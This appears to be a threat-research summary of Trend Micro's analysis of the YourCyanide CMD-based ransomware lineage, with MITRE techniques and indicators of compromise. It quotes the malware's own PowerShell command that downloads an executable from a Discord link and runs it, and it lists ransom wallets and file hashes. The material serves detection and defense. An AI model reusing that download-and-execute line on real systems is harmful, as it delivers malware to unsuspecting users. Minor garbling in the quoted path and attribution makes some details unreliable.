Threat Research

YourCyanide: A CMD-Based Ransomware With Multiple Layers of Obfuscation

Securonix

Trend Micro’s Threat Hunting team analyzed a series of CMD-based ransomware variants, culminating in YourCyanide, a multi-stage malware that uses layered downloads and heavy obfuscation. The family evolves from GonnaCope through Kekpop and Kekware, employing Discord, Pastebin, and document links to fetch payloads and evading detection with custom environment variables and delayed expansion. #YourCyanide #GonnaCope #Kekware #Kekpop #Discord #Pastebin #LNK

Keypoints

  • YourCyanide is a sophisticated CMD-based ransomware variant that uses multi-layer obfuscation and environment-variable tricks to hide activity and downloads multiple payloads.
  • It relies on a multi-stage delivery chain, starting from an LNK file that downloads YourCyanide.exe via PowerShell from Discord, then proceeds to fetch additional payloads through Pastebin and Discord in successive steps.
  • The ransomware family traces its lineage from GonnaCope (April 2022) to Kekpop and Kekware, with each variant introducing new capabilities such as credential collection and enabling RDP.
  • Early variants like GonnaCope could overwrite files or avoid certain capabilities, while later variants add network-wide notifications and more aggressive features, indicating a worm/propagation mindset.
  • Behavioral differences across variants include auto-start mechanisms, disabling Task Manager, collecting installed apps and browser passwords, and renaming or encrypting files in various ways.
  • Trend Micro notes very low detections due to heavy obfuscation, and highlights the actors’ apparent monitoring of sandbox usernames to tailor evasion lists.
  • trends Micro recommends a multilayer defense approach (Vision One, Cloud One Workload Security, Deep Discovery Email Inspector, and Apex One) to detect and block these components and behaviors.

MITRE Techniques

  • [T1059.001] PowerShell – The LNK arrives with a PowerShell command to download and run the payload. Quote relevant content: “…contains the following PowerShell script for downloading the ‘YourCyanide.exe’ 64-bit executable from Discord and executing it: ‘C:WindowsSystem32WindowsPowerShellv1.0powershell.exe -Command “(New-Object Net.WebClient).DownloadFile(‘hxxps://cdn.discordapp.com/attachments/974799607894769704/975527548983341056/YourCyanide.exe’, ‘YourCyanide.exe’)”; start YourCyanide.exe’.”
  • [T1105] Ingress Tool Transfer – The payload is downloaded from external sources (Discord, Pastebin) as part of a staged delivery. Quote relevant content: “…downloading the ‘YourCyanide.exe’ 64-bit executable from Discord and executing it” and “downloading the succeeding files via Discord and Pastebin with each step…”
  • [T1547.001] Boot or Logon Autostart Execution – The malware “creates auto-start mechanism” to persist on reboot. Quote relevant content: “Creates auto-start mechanism” in the variant comparison.
  • [T1027] Obfuscated/Compressed Files or Information – The article notes “multiple layers of obfuscation and takes advantage of custom environment variables and the Enable Delayed Expansion function to hide its activities.”
  • [T1562.001] Impair Defenses – The ransomware family “disables task manager” as part of its evasion. Quote relevant content: “Disables task manager” in the variant table.

Indicators of Compromise

  • [File] GonnaCope.Bat – ab71472e5a66740369c70715245a948d452a59ea7281233d6ad4c53dfa36b968, 0dff760288b3dfebc812761a2596563e5f0aea8ffc9ca4a4c26fa46e74311122, and 2 more hashes
  • [File] GonnaCopeDL – f9fdfb0d4e2d2ea06ce9222280cd03d25c9768dfa502b871846153be30816fd3
  • [Bitcoin Wallet] bc1qlly4puaz7pz3zmph8n2d620jc2j60qf4ve5qll, bc1qrl532s9r2qge8d8p7qlrq57dc4uhssqjexmlwf
  • [LNK] 31655244d3b77ae661f10199cd823f54c473d92a88ae892ee1b75bc5794482ad, 9e973f75c22c718c7438bc1d4614be11ae18e2d5140ecc44c166b5f5102d5fbe, c5d842735709618ee4f2521c95bf029a0690c3cbe5f7a06a916f633ebe09dd50, f9a2c524c270d581b83c010136402c00623bb36b2dd7758ea5e59c9369fa7649
  • [LNK] KEKPOP.YXCEST variants – multiple LNK/shortcut samples with associated detections (Trojan.LNK.KEKPOP.YXCEST, Trojan.LNK.KEKPOP.YXCERT)
  • [Username] a.monaldo, karolisliucveikis, soumy
  • [Email] contact at [email protected]

Read more: https://www.trendmicro.com/en_us/research/22/f/yourcyanide-a-cmd-based-ransomware.html